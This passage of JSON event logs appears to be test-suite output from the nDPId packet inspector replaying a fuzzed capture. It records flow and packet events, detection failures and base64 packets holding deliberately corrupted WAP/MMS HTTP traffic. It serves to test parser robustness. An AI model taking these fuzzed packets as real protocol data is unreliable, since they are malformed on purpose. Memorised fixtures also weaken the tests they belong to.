00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854532143,"flow_last_seen":1031854532143,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854532143,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.68.5","src_port":80,"dst_port":2604,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1031854532143,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854532143,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxMJAAEAGF9OsFAMNrBREBQBQCizKXura5OazWVAlcwB2dwAA"} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1031854532143,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854532143,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxMJAAEAGF9OsFAMNrBREBQBQCizKXura5OazWVAlcwB2dwAA"}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":69,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535021,"flow_last_seen":1031854535021,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854535021,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":69,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535021,"flow_last_seen":1031854535021,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854535021,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1031854535021,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854535021,"pkt":"CAAgsl17AFCLk5N8CABFAAAsJEtAAIAGeEasFAMFrBQDDQotAFDk8VvfAAAAAGACIADOnQAAAgQFtGDD"} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1031854535021,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854535021,"pkt":"CAAgsl17AFCLk5N8CABFAAAsJEtAAIAGeEasFAMFrBQDDQotAFDk8VvfAAAAAGACIADOnQAAAgQFtGDD"}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1031854535021,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854535021,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxMVAAEAGF8ysFAMNrBQDBQBQCi3KbXHL5PFb4GASgywvJwAAAgQFtA=="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1031854535021,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854535021,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxMVAAEAGF8ysFAMNrBQDBQBQCi3KbXHL5PFb4GASgywvJwAAAgQFtA=="}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1031854535021,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854535021,"pkt":"CAAgsl17AFCLk5N8CABFAAAoJUtAAIAGd0qsFAMFrBQDDQotAFDk8Vvgym1xzFAQIjin2AAAAgQFtGDD"} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1031854535021,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854535021,"pkt":"CAAgsl17AFCLk5N8CABFAAAoJUtAAIAGd0qsFAMFrBQDDQotAFDk8Vvgym1xzFAQIjin2AAAAgQFtGDD"}
02321{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":72,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":1514,"pkt_l4_len":0,"thread_ts_msec":1031854535021,"pkt":"CAAgsl17AFCLk5N8CABFACVzAEtAAIAGcJasFAMFrBQDDQotAFDk8Vvgym1xzFAQIjhHEAAAUE9TVCAvc2VydmxldHMvbW1zIEhUVFAvMS4xDQpIb3N0OiAxNzIuMjAuMy4xMw0KT3B0OiAiaHR0cDovL3d3dy53My5vcmcvMTk5OS8wNi8yNC1DQ1BQZXhjaGFuZ2UiOyBucz01Ng0KQ29udGVudC1UeXB0OiBhcHBsaWNhdGlvbi92bmQud2FwLm1tcy1tZXNzYWdlDQpBY2NlcHQ6IGFwcGxpY2F0Rm9uL3ZuZC53YXAubW1zLW1lc3NhZ2UNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpBY2NlcHQtTGFuZ3VhZ2U6IENuDQpVc2VyLUFnZW50OiBTb255inJpY3Nzb25UNjgvUjIwMUENCkFjY2Vw9C1DaGFyc2V0OiAqDQo1Ni1Qcm9maWxlLURpZmYtMTogPD94bWwgdqdyc2lvbj0iMS4wIj8+PHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjInhtbG5zOnByZj0ibHR0cDovL3d3dy53YXBmb3J1bS5vcmcvVUFQUk9GL2Nja3BzY2hlbWEtMTk5OTEwMTQjIj48IS0tIGJyb3dzZXIgdmVuZG9yIHNpdGU6IERlZmF1bHQgZGVzY3JpcHRpb24gb2YgcHJvcGVydGllcyAtLT48cmRmOkRlc2NyaXB0aW9uPjxwcmY6Q2NwcEFjY2VwdD48cmRmOkJhJXMAcmRmOmxpPmFwcGxpY2F0aW9uL3ZubC53YXAubW1zLW1lc3NhZ2U8L3JkZjpsaT48L3JkZjpCYWc+PC9wcmY6Q2NwcEFjY2VwdD48L3JkZjpEZXNjcmlwdGlvbj48L3JkZjpSREY+DQo1Ni1Qcm9maWxlLURpZmYt1TogPD94bWwgdmVyc2lvbj0iMS4wIj8+PHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjInhtbG5zOnByZj0iaHR0cDovL3d3dy53YXBmb3J1bS5vUmcvVUFQUk9GL2NjcHBzY2hlbWEtMTk5OTEwMTQjIiVzAC0tIGJyb3dzZXIgdmVuZG9yIHNpdGU6IEQlcwB1bHQgZGVzY3JpcHRpb24gb2YgcHJvcGVydGllcyAtJj48cqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 02307{"packet_event_id":1,"packet_event_name":"packet","packet_id":72,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":1514,"pkt_l4_len":0,"thread_ts_msec":1031854535021,"pkt":"CAAgsl17AFCLk5N8CABFACVzAEtAAIAGcJasFAMFrBQDDQotAFDk8Vvgym1xzFAQIjhHEAAAUE9TVCAvc2VydmxldHMvbW1zIEhUVFAvMS4xDQpIb3N0OiAxNzIuMjAuMy4xMw0KT3B0OiAiaHR0cDovL3d3dy53My5vcmcvMTk5OS8wNi8yNC1DQ1BQZXhjaGFuZ2UiOyBucz01Ng0KQ29udGVudC1UeXB0OiBhcHBsaWNhdGlvbi92bmQud2FwLm1tcy1tZXNzYWdlDQpBY2NlcHQ6IGFwcGxpY2F0Rm9uL3ZuZC53YXAubW1zLW1lc3NhZ2UNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpBY2NlcHQtTGFuZ3VhZ2U6IENuDQpVc2VyLUFnZW50OiBTb255inJpY3Nzb25UNjgvUjIwMUENCkFjY2Vw9C1DaGFyc2V0OiAqDQo1Ni1Qcm9maWxlLURpZmYtMTogPD94bWwgdqdyc2lvbj0iMS4wIj8+PHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjInhtbG5zOnByZj0ibHR0cDovL3d3dy53YXBmb3J1bS5vcmcvVUFQUk9GL2Nja3BzY2hlbWEtMTk5OTEwMTQjIj48IS0tIGJyb3dzZXIgdmVuZG9yIHNpdGU6IERlZmF1bHQgZGVzY3JpcHRpb24gb2YgcHJvcGVydGllcyAtLT48cmRmOkRlc2NyaXB0aW9uPjxwcmY6Q2NwcEFjY2VwdD48cmRmOkJhJXMAcmRmOmxpPmFwcGxpY2F0aW9uL3ZubC53YXAubW1zLW1lc3NhZ2U8L3JkZjpsaT48L3JkZjpCYWc+PC9wcmY6Q2NwcEFjY2VwdD48L3JkZjpEZXNjcmlwdGlvbj48L3JkZjpSREY+DQo1Ni1Qcm9maWxlLURpZmYt1TogPD94bWwgdmVyc2lvbj0iMS4wIj8+PHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjInhtbG5zOnByZj0iaHR0cDovL3d3dy53YXBmb3J1bS5vUmcvVUFQUk9GL2NjcHBzY2hlbWEtMTk5OTEwMTQjIiVzAC0tIGJyb3dzZXIgdmVuZG9yIHNpdGU6IEQlcwB1bHQgZGVzY3JpcHRpb24gb2YgcHJvcGVydGllcyAtJj48cqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
00232{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":72,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","l4_data_len":1480,"global_ts_msec":1031854535021} 00218{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":72,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","l4_data_len":1480,"global_ts_msec":1031854535021}
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535021,"flow_last_seen":1031854535021,"flow_idle_time":7440000,"flow_min_l4_payload_len":423,"flow_max_l4_payload_len":423,"flow_tot_l4_payload_len":423,"flow_avg_l4_payload_len":423,"midstream":1,"thread_ts_msec":1031854535021,"l3_proto":"ip4","src_ip":"51.20.3.5","dst_ip":"172.20.3.13","src_port":2605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535021,"flow_last_seen":1031854535021,"flow_idle_time":7440000,"flow_min_l4_payload_len":423,"flow_max_l4_payload_len":423,"flow_tot_l4_payload_len":423,"flow_avg_l4_payload_len":423,"midstream":1,"thread_ts_msec":1031854535021,"l3_proto":"ip4","src_ip":"51.20.3.5","dst_ip":"172.20.3.13","src_port":2605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
01031{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1031854535021,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":477,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":477,"pkt_l4_len":443,"thread_ts_msec":1031854535021,"pkt":"CAAgsl17AFCLk5N8CABFAAHPJ0tAAIAGc6MzFAMFrBQDDQotAFDk8WGUym1xzFAYIjj+OwAAMjAxLnhtbCIsIjEtT3dQVndnTWs4aXRxR3gwOGZNWXVTdz09IiwiMi1IZ0NURVFFMW8ydmVOM0ZCeW8xLzVnPT0iLCIzLXpJdGdzCXlLQnBCem01c2xPb2RISEE9PYeXCkNvb2tpZTogVXNlci1JZGVudGl0eS1Gb3J3YXJkLXBwcC11c2VybmFtZT02QzZENjM2RDZGNkM2Ng0KQ29va2llOiBVc2VyLUlkZW50aXR5LUZvcndhcmQtbXNpc2RuPTM0MzkzMTM3MzIzNjMxMzAzMTMwMzAzNA0KQ29vayVzACBVc2VyLUlkZW50aXR5LUF1dGhlbnRpY2F0aW9uPUJlYXJncg0KQ29va2llOiBJcC1BZGRybXNzPTE5Mi4xNjguMi4mNg0KQ29va2llOiBCZWFyZXItVHlwZT1VRFANCldBUC1Db25uZWN0aW9uOiBTdGFjay1UeXBlPUNPDQpDb29raWU6IHd0bHMtc2VjdXJpdHktbGV2ZWw9bm9uZQ0KQ29udGVudC1MZW5ndGg6IDE0DQoNCoyDmDE4OTAwMQCNkJGA"} 01031{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1031854535021,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":477,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":477,"pkt_l4_len":443,"thread_ts_msec":1031854535021,"pkt":"CAAgsl17AFCLk5N8CABFAAHPJ0tAAIAGc6MzFAMFrBQDDQotAFDk8WGUym1xzFAYIjj+OwAAMjAxLnhtbCIsIjEtT3dQVndnTWs4aXRxR3gwOGZNWXVTdz09IiwiMi1IZ0NURVFFMW8ydmVOM0ZCeW8xLzVnPT0iLCIzLXpJdGdzCXlLQnBCem01c2xPb2RISEE9PYeXCkNvb2tpZTogVXNlci1JZGVudGl0eS1Gb3J3YXJkLXBwcC11c2VybmFtZT02QzZENjM2RDZGNkM2Ng0KQ29va2llOiBVc2VyLUlkZW50aXR5LUZvcndhcmQtbXNpc2RuPTM0MzkzMTM3MzIzNjMxMzAzMTMwMzAzNA0KQ29vayVzACBVc2VyLUlkZW50aXR5LUF1dGhlbnRpY2F0aW9uPUJlYXJncg0KQ29va2llOiBJcC1BZGRybXNzPTE5Mi4xNjguMi4mNg0KQ29va2llOiBCZWFyZXItVHlwZT1VRFANCldBUC1Db25uZWN0aW9uOiBTdGFjay1UeXBlPUNPDQpDb29raWU6IHd0bHMtc2VjdXJpdHktbGV2ZWw9bm9uZQ0KQ29udGVudC1MZW5ndGg6IDE0DQoNCoyDmDE4OTAwMQCNkJGA"}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535022,"flow_last_seen":1031854535022,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854535022,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.76.5","src_port":80,"dst_port":65069,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535022,"flow_last_seen":1031854535022,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854535022,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.76.5","src_port":80,"dst_port":65069,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1031854535022,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854535022,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxMZAAEAGF8+sFAMNrBRMBQBQ\/i3KbXHM5PFhlFAQgyxBMAAA"} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1031854535022,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854535022,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxMZAAEAGF8+sFAMNrBRMBQBQ\/i3KbXHM5PFhlFAQgyxBMAAA"}
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":75,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535090,"flow_last_seen":1031854535090,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1031854535090,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"44.20.3.5","src_port":80,"dst_port":2605,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":75,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535090,"flow_last_seen":1031854535090,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1031854535090,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"44.20.3.5","src_port":80,"dst_port":2605,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1031854535090,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":197,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":197,"pkt_l4_len":163,"thread_ts_msec":1031854535090,"pkt":"AFCLk5N8CAAgsl17CABFAAC3xMdAAEAGFz+sFAMNLBQDBQBQCi3KbXHM5PFjO1AYgyyWzgAASFRUUC8xLjEgMjIwIE9LDQpTZXJ2ZXI6IEJlc2luLzIuMC4xDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3Zuay53YXAubW1zLW1lc3NhZ2UNCkNvbnRlbnQtTGVuZ3RoOiAwDQpEYXRlOiBUaHUsIDEyIFNlcCAyMDAyIDE4OjFKOjM1IEdNVA0KDQo="} 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1031854535090,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":197,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":197,"pkt_l4_len":163,"thread_ts_msec":1031854535090,"pkt":"AFCLk5N8CAAgsl17CABFAAC3xMdAAEAGFz+sFAMNLBQDBQBQCi3KbXHM5PFjO1AYgyyWzgAASFRUUC8xLjEgMjIwIE9LDQpTZXJ2ZXI6IEJlc2luLzIuMC4xDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3Zuay53YXAubW1zLW1lc3NhZ2UNCkNvbnRlbnQtTGVuZ3RoOiAwDQpEYXRlOiBUaHUsIDEyIFNlcCAyMDAyIDE4OjFKOjM1IEdNVA0KDQo="}
00377{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":76,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1031854535090,"pkt":"CAAgsl17AFCLk5N8CAAQAAAoKUtAAIAGc0qsFAMFrBQDDQotAFDk8WM7ym1yW1AQIamgfQAAYXRpb24v"} 00363{"packet_event_id":1,"packet_event_name":"packet","packet_id":76,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1031854535090,"pkt":"CAAgsl17AFCLk5N8CAAQAAAoKUtAAIAGc0qsFAMFrBQDDQotAFDk8WM7ym1yW1AQIamgfQAAYXRpb24v"}
00210{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":1,"thread_id":0,"packet_id":76,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1031854535294} 00196{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":1,"packet_id":76,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1031854535294}
00369{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":79,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":54,"pkt_l4_len":0,"thread_ts_msec":1031854543315,"pkt":"AFCLk5N8CAAgsl17CABFAACqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} 00355{"packet_event_id":1,"packet_event_name":"packet","packet_id":79,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":54,"pkt_l4_len":0,"thread_ts_msec":1031854543315,"pkt":"AFCLk5N8CAAgsl17CABFAACqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"}
00230{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":79,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","l4_data_len":20,"global_ts_msec":1031854543322} 00216{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":79,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","l4_data_len":20,"global_ts_msec":1031854543322}
00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854543322,"flow_last_seen":1031854543322,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854543322,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 